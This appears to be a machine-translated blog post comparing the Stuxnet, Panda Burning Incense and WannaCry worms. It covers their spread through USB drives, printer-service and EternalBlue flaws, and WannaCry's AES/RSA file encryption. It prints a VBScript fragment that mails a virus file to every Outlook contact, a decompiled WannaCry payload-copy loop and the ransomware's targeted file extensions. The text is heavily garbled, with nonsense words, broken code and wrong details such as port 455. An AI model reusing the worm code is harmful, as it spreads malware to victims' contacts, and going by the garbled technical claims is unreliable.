Stuxnet worm virus, MS 10-06 1, when worm virus value is input into the machine, it is set to self-start, and the driver is set to service self-start. The driver is responsible for breaking through the limitation of TCP semi-open connection in the system to facilitate the spread of worms through the network. Removable drive (i.e. USB flash drive, etc.). The infected system can spread itself through the USB flash drive. The remote code execution vulnerability of MS 10-06 1 printer service spreads in the local area network. And try to use some weak passwords in an attempt to guess and gain host permissions, endangering the security of the whole network. Setting a back door for the computer, constantly trying to connect with the remote hacker server, collecting user information and receiving hacker instructions, can obtain the Trojan horse of the hacker remote server and execute it, which brings serious security risks.

I burned incense with pandas for a long time. Although I had the original worm, I didn't analyze the key code, only found some variants that were said to have been changed 50 times from the Internet.

Settings? objOA=Wscript。 CreateObject("Outlook。 Application ")

Create objects for OUTLOOK applications.

Set objMapi=objOA. GetNameSpace("MAPI ")

Get MAPI namespace? For what? i= 1？ Where to? objMapi。 Address book Does it count? Traversal address book

Settings? objAddList=objMapi。 Address list of (I)? j= 1？ Where to? objAddList。 ? Address entry. Count?

Settings? objMail=objOA。 CreateItem？ (0)objMail。 Recipient. Add? (objAddList。 ? Address entry? (j)

Get the e-mail address of the recipient

objMail。 Subject= "？ Hello! ”？

Set the subject of the message.

ObjMail。 Body= "The attachment for you this time is my new document!" ?

Set the content of the letter

objMail。 Attachments.Add("c:virus.vbs ")

Expand yourself as an attachment.

objMail。 Send?

send a mail

Next?

Next?

Settings? ObjMapi = none?

Settings? ObjOA = nothing?

This piece is the way the source code is spread. In fact, it is to hijack the account password of the mailbox and automatically send emails to friends. In fact, the attachment is a copy of the virus. Related to the recent bitcoin virus, it can only be quickly infected through port 455 in the local area network.

Its infection mode is mainly through downloading, and the virus will delete the ghost file and replace the picture of the document without destroying the file.

Bitcoin virus is different.

WannaCry Trojan uses the "Eternal Blue" vulnerability tool in the leaked Equation Toolkit to scan the network port (port 455) from the vulnerability MS 17_0 10. After the target machine is successfully captured, it will download WannaCry Trojan from the attacking machine for infection, and then scan the Internet and other machines in the local area network again as the attacking machine, resulting in the large-scale and ultra-fast spread of worm infection.

Mssecsvc.exe is Troy's mother. After running, it will scan the internet machines with random ip to try to infect, and it will also scan the machines in the same network segment in the LAN to spread infection. In addition, it will release the blackmail program tasksche.exe encryption and blackmail disk files.

v 1 = 0；

do

{

P _ payload = & amppayload _ x86

If(v 1)

P _ payload =& payload _ x64

V3=*(void **), amp file name [4 * v1= 260];

(& ampv 1 1+v 1)=(int)v3；

memcpy(v3，p_payload，v 1！ =0? 5 1364: 16480);

*(& amp； v 1 1+v 1)+= v 1！ =0? 5 13634: 16480;

++v 1

}

while(v 1 & lt； 2);

V4+CreateFileA (file name, 0*8000000u, 1u, 03u, 4u, 0);

This is based on the data of MS 17_0 10, and this pot can only be given back to those who don't update the patch.

Trojan encryption uses AES to encrypt files, and uses asymmetric encryption algorithm RSA 2048 to encrypt random keys. Each file uses a random key, and the following is the probability of encryption. Just like the German Enigma cipher machine in World War II, the daily cipher algorithm is astronomical, and the rest can't be cracked unless the key is obtained.

Panda burning incense won't damage the document, but it will do.

. doc，。 docx，。 xls，。 xlsx，。 ppt，。 pptx，。 pst，。 ost，。 Monosodium glutamate. eml，。 vsd，。 vsdx，。 txt，。 csv，。 rtf，. 123，.wks，. wk 1，.pdf，。 Drawings,. onetoc2,. snt,. jpeg，。 jpg，。 docb，。 docm，。 Point,. dotm，。 dotx，。 xlsm，。 xlsb，。 xlw，。 xlt，。 xlm，。 xlc，。 xltx，。 xltm，。 pptm，。 Pot,. pps，。 ppsm，。 ppsx，。 ppam，。 potx，。 potm，。 Economic development bureau. hwp，. 602，.sxi，。 sti，。 sldx，。 sldm，。 sldm，。 vdi，。 vmdk，。 vmx，。 gpg，。 aes，。 Arc. PAQ，. bz2，.tbk，。 bak，。 Tar, tgz，。 gz，. 7z，.rar，。 zip，。 Back up. iso，。 vcd，。 bmp，。 png，。 gif，。 Primitive. cgm，。 tif，。 tiff，。 nef，。 psd，。 Ai,. svg，。 djvu、. m4u、. m3u、。 mid，。 wma，。 flv，. 3g2，.mkv，. 3gp，. mp4，.mov，。 avi，。 asf，。 mpeg，。 vob，。 mpg，。 wmv，。 Florida. swf，。 wav、. mp3、。 Shh. Class,. Can,. java，。 rb，。 asp，。 php，。 jsp，。 brd，。 sch，。 dch，。 dip，。 pl，。 vb，。 Vbs,. ps 1,. Bat,. cmd，。 js，。 asm，。 h，。 pas，。 cpp，。 c，。 cs，。 Suo. sln，。 ldf，。 Medium density fiberboard. ibd，。 myi，。 myd，。 frm，。 odb，。 dbf，。 db，。 mdb，。 accdb，。 sql，。 Sqlitedb, sqlite3, .asc, .lay6,. Lay down,. mml，。 sxm，。 otg，。 odg，。 uop，。 Standard, sxd，。 otp，。 odp，. wb2，.slk，。 dif，。 stc，。 sxc，。 ots，。 ods，. 3dm，.max，. 3ds，.uot，。 stw，。 sxw，。 Otto. odt，。 pem，. p 12，.csr，。 crt，。 Key, pfx，。 Draw out (short for derivative)

These are all document suffixes that viruses will attack.

Different from Panda, it will connect with the server through tor anonymous listening port 9050 and local proxy communication.